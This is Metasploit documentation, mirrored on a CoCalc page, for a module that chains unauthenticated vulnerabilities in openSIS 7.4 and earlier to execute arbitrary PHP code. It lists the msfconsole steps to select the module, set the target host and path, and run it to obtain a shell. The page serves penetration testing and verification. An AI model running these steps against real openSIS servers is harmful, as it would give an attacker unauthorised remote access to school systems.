CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/documentation/modules/exploit/unix/webapp/opensis_chain_exec.md
Views: 1904
Vulnerable Application
This module exploits multiple vulnerabilities in openSIS 7.4 and prior versions which could be abused by unauthenticated attackers to execute arbitrary PHP code. It is based on these advisories:
The module has been successfully tested against openSIS versions 7.3 and 7.4 running on Ubuntu. Older versions might be affected as well.
Download link: https://sourceforge.net/projects/opensis-ce/files/
Verification Steps
Install the web application
Start msfconsole
Do:
use unix/webapp/opensis_chain_exec
Do:
set RHOSTS [IP]
Do:
set TARGETURI [/path/to/opensis]
Do:
run
You should get a shell.
Options
TARGETURI
The base path to the web application (e.g. /opensis/
). The default value is /
.
Scenarios
openSIS 7.4 running on Ubuntu 18.04.4